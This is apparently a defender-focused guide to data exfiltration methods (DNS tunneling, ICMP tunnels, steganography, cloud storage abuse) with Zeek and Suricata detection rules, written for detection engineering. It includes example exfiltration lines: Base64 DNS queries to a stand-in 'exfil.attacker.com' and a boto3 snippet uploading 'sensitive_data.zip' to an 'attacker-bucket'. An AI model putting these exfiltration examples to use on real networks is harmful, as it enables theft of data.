Data Exfiltration Techniques Every Defender Should Know

After a threat actor establishes a foothold inside a network, their ultimate goal is usually data: credentials, intellectual property, customer records, strategic documents. Getting that data out without triggering alarms is the challenge of data exfiltration, and attackers have developed a wide range of techniques designed to blend into normal network traffic or bypass data loss prevention (DLP) controls entirely.

Understanding these techniques is essential for defenders building detection capabilities. This guide covers the most common exfiltration methods with enough technical detail to inform both detection engineering and defensive architecture.

DNS Tunneling

DNS is ideal for data exfiltration because it is almost never blocked at the perimeter. Even networks with aggressive outbound firewall rules typically allow DNS traffic through, and many organizations either run no DNS monitoring at all or rely solely on blocklists for threat detection.

How It Works

An attacker encodes data in DNS query hostnames. Because DNS queries for a domain like attacker.com will pass through internal resolvers and ultimately reach the attacker’s authoritative nameserver, data can be exfiltrated as subdomains:

c3VwZXJzZWNyZXRkYXRhY2h1bmsx.exfil.attacker.com
c3VwZXJzZWNyZXRkYXRhY2h1bmsyMg.exfil.attacker.com

Each query carries a Base64-encoded chunk of the stolen data. The attacker’s authoritative DNS server receives and reassembles it. Tools that implement this include Iodine, DNScat2, and dnsexfil.

Detection with Zeek

Zeek (formerly Bro) can detect DNS tunneling through behavioral analysis rather than signature matching:

event dns_request(c: connection, msg: dns_msg, query: string, qtype: count, qclass: count) {
    if (|query| > 50) {
        # Long subdomain labels are a strong indicator
        NOTICE([$note=DNS::Tunneling_Candidate,
                $conn=c,
                $msg=fmt("Long DNS query: %s", query)]);
    }
}

Key behavioral indicators:

High query volume to a single domain in a short time window
Unusually long subdomain labels (normal hostnames rarely exceed 30 characters)
High entropy subdomains — Base64-encoded data has higher entropy than human-readable hostnames
No corresponding HTTP/HTTPS traffic to the queried domain
Rare NXDOMAIN ratios — many tunneling tools generate queries for nonexistent subdomains

Suricata Signature

alert dns any any -> any any (msg:"Possible DNS Tunneling - High Entropy Query";
  dns.query; content:"."; pcre:"/^[a-zA-Z0-9+\/]{40,}\./";
  threshold: type both, track by_src, count 10, seconds 60;
  sid:9000001; rev:1;)

ICMP Covert Channels

ICMP (the protocol underlying ping) allows arbitrary data in the payload field of echo request and reply packets. Because ICMP is a core networking protocol, it is rarely inspected and often allowed through firewalls.

How It Works

Tools like Ptunnel, icmptunnel, and Hans establish full bidirectional tunnels over ICMP echo traffic. An attacker pings their command-and-control server with data-stuffed ICMP payloads. The C2 server responds with commands. To a casual observer, this looks like routine connectivity testing.

Normal ICMP echo requests have 32–64 bytes of payload (often just letters of the alphabet). Tunneling tools fill the full 65,507-byte maximum.

Detection

Flag ICMP echo packets with payloads exceeding 64 bytes
Alert on high-frequency ICMP traffic to a single external IP
Inspect ICMP payloads for high-entropy data rather than the standard repeating patterns

Zeek script approach:

event icmp_echo_request(c: connection, icmp: icmp_conn, id: count, seq: count, payload: string) {
    if (|payload| > 64) {
        NOTICE([$note=ICMP::Oversized_Payload, $conn=c,
                $msg=fmt("ICMP payload %d bytes", |payload|)]);
    }
}

Steganography

Steganography hides data inside seemingly innocent files — images, audio, video, or documents — making exfiltration invisible to DLP tools that scan for known file types or keyword patterns.

Common Techniques

LSB (Least Significant Bit) image steganography: Each pixel’s least significant color bit stores one bit of hidden data. Modifying an image this way creates no perceptible visual change but allows several MB of data per image file.
Document metadata embedding: Sensitive data hidden in Word document properties, PDF metadata, or EXIF fields of images
Audio steganography: Data encoded in inaudible frequency ranges or in audio file waveforms using tools like DeepSound or Steghide

Real-World Use

Nation-state actors including APT32 (OceanLotus) have used steganography operationally. A 2024 Kaspersky report documented a campaign where stolen credentials were encoded in PNG files uploaded to legitimate image hosting services. DLP tools saw a PNG upload to Imgur — not a red flag. The attacker’s server downloaded the same image and extracted the data.

Detection

Statistical analysis tools (StegExpose, stegdetect) can identify LSB steganography with reasonable accuracy
Monitor for unusually large uploads of image files from endpoints that do not typically generate such traffic
Hash-compare uploaded images against their originals if they originated internally

Cloud Storage Abuse

Uploading stolen data to legitimate cloud services — Google Drive, OneDrive, Dropbox, AWS S3 — is one of the most effective DLP evasion techniques because the traffic is:

Encrypted (HTTPS)
Destined for trusted domains that are on most allowlists
Indistinguishable in volume analysis from legitimate sync traffic

The Technique

The attacker installs a legitimate cloud sync client, authenticates to an attacker-controlled account, places sensitive files in the sync folder, and allows the client software to upload them. Alternatively, they use cloud provider APIs directly:

import boto3
s3 = boto3.client('s3', aws_access_key_id='ATTACKER_KEY', ...)
s3.upload_file('sensitive_data.zip', 'attacker-bucket', 'data.zip')

Detection

DLP with cloud integration: Inspect content going to cloud storage using CASB (Cloud Access Security Broker) solutions (Microsoft Defender for Cloud Apps, Netskope, Zscaler)
Allowlist corporate cloud tenants: Use tenant restrictions to ensure traffic to OneDrive goes only to your organization’s tenant, not arbitrary Microsoft accounts
Monitor for cloud sync client installations on endpoints where they are not expected
Alert on volume spikes — exfiltrating gigabytes of data to Dropbox in minutes differs from normal sync behavior

Additional Evasion Techniques

Slow and Low Exfiltration

Attackers who are patient limit bandwidth deliberately — exfiltrating 100MB over weeks rather than minutes to stay below volumetric anomaly detection thresholds.

Detection: Long-term baseline baselining. Alert on sustained persistent connections to uncommon external hosts, even at low bandwidth.

Protocol Smuggling

Hiding data inside legitimate protocol fields: HTTP User-Agent headers, HTTP/2 HEADERS frames, TLS SNI fields, or unused bits in TCP options.

Encrypted C2 Channels

Modern malware (Cobalt Strike, Sliver, Brute Ratel) uses HTTPS for C2 communication, with traffic profiles that mimic legitimate services (fake Microsoft or CDN traffic). Detection requires TLS fingerprinting (JA3/JA4 hashes) and behavioral analysis of connection timing and data volumes.

Building a Detection Strategy

Effective exfiltration detection requires multiple layers:

Layer	Tooling	What It Catches
Network visibility	Zeek, Suricata, Corelight	DNS tunneling, ICMP abuse, protocol anomalies
Endpoint telemetry	EDR (CrowdStrike, SentinelOne)	File access patterns, process-to-network associations
CASB	Netskope, Defender for Cloud Apps	Cloud storage abuse, shadow IT uploads
DLP	Symantec DLP, Microsoft Purview	Keyword/pattern matching in content
UEBA	Splunk UBA, Exabeam	Behavioral baselines, anomalous data access

No single tool catches all methods. A defender who understands how these techniques work — and where each detection approach has blind spots — is far better positioned to build layered visibility than one who relies on a single product’s marketing claims.